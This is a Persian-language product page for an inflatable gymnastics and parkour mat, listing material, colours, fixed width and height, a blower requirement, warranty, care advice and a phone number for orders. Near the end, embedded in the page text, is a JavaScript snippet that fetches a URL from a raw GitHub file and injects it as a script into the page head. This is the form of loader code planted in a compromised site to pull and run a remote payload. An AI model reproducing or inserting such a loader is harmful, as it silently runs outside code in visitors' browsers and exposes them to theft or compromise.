تشک ژیمناستیک و پارکور بادی

تشک ژیمناستیک و پارکور بادی

  • تشک ژیمناستیک و پارکور بادی ابتکاری از بادی سازان مجد بوده و این طرح در هیچ شرکت دیگری در ایران تولید نمی شود.

    جنس تشک ژیمناستیک

    جنس تشک ژیمناستیک از بالاترین کیفیت پارچه دو لایه کره ای بوده و پس از اطمینان از کیفیت بالا تولید تشک انجام می گردد. اتصال پارچه تشک به صورت پرس با دستگاه قالب می باشد. همچنین بسته به سفارش و نیاز شما دارای تعدادی کانال بلیزر می باشد.

    طرح و رنگ

    طرح این تشک به صورت ثابت بوده و قابلیت تغییر نیست! اما در صورت نیاز می توان رنگ آن را به رنگ های قرمز ،زرد، سرمه ای، آبی روشن و نارنجی بسته به سفارش مشتری و موجودی تغییر داد.

    ابعاد تشک ژیمناستیک

    ابعاد تشک زیمناستیک با عرض 2.20 متر و ارتفاع 35 سانتی متر ثابت می باشد. اما طول این محصول بسته به نیاز شما به صورت سفارشی انجام می گردد. همچنین تعدادی کانال بلیزر بسته به طول شما درون تشک قرار می گیرد.

    لوازم مورد نیاز

    تشک ژیمناستیک و پارکور تولید بادی سازان مجد به لوازم خاصی نیاز ندارد. تنها جهت پر کردن باد آن می توانید از بلوور استفاده نمایید. بسته به طول و حجم تشک شما بلوور پیشنهادی متفاوت است که می توانید با تماس با پشتیبانی اطلاعات کافی را دریافت نمایید.

    برای خرید می توانید با شماره تلفن 09127484573 تماس حاصل فرمایید.

    ضمانت و خدمات

    این محصول دارای 6 ماه ضمانت و خدمات پس از فروش مادام العمر می باشد.

    نحوه نگهداری از تشک پارکور

    این تشک مخصوص سالن های ورزشی و باشگاه ها ساخته شده. بنابرین آفتاب و آب و هوای نا مسائد مانند رطوبت و باران به آن آسیب میرساند. همچنین بهتر است از برخورد وسایل تیز و سطح نا هموار جلوگیری شود

    نحوه خرید

    برای خرید این تشک ژیمناستیک می توانید با شماره تلفن 09127484573 تماس حاصل فرمایید. همچنین برای مشاهده محصول می توانید بر روی لینک زیر کلیک کنید.

    مشاهده تشک ژیمناستیک و پارکور

    همچنین شما می توانید دیگر محصولات مارا در فروشگاه دنبال کنید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۲ رای

    دیدگاهتان را بنویسید